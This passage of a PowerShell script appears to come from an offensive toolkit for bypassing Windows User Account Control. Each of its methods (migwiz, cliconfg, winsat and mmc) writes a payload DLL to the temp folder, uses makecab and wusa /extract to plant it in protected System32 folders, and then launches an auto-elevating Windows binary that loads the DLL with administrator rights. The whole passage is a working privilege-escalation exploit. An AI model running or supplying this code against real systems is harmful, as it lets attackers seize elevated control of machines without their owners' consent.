[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\migwiz\"
$execpath = "C:\Windows\System32\migwiz\migwiz.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"cliconfg"
{
Write-Output "Using cliconfg method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\"
$execpath = "C:\Windows\System32\cliconfg.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"winsat"
{
Write-Output "Using winsat method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "devobj.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\sysprep\"
$execpath = "C:\Windows\System32\sysprep\winsat.exe"
$Targetwinsat = "$env:temp\uac_winsat.cab"
Write-Output "Copying C:\Windows\System32\winsat.exe to $env:temp"
Copy-Item "C:\Windows\System32\winsat.exe" "$env:temp\winsat.exe"
Write-Output "Creating cab $Targetwinsat"
$null = & makecab "$env:temp\winsat.exe" $Targetwinsat
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Targetwinsat /extract:$wusapath
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"mmc"
{
Write-Output "Using mmc method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "elsext.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\"
$execpath = "C:\Windows\System32\mmc.exe eventvwr.msc"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
}
#Clean up
Write-Output "Removing $Target."
Remove-Item -Path $Target
Write-Output "Removing $PathToDll."
Remove-Item -Path $PathToDll
Write-Output "$wusapath$dllname must be removed manually."
Write-Output "$PayloadPath must be removed manually."
}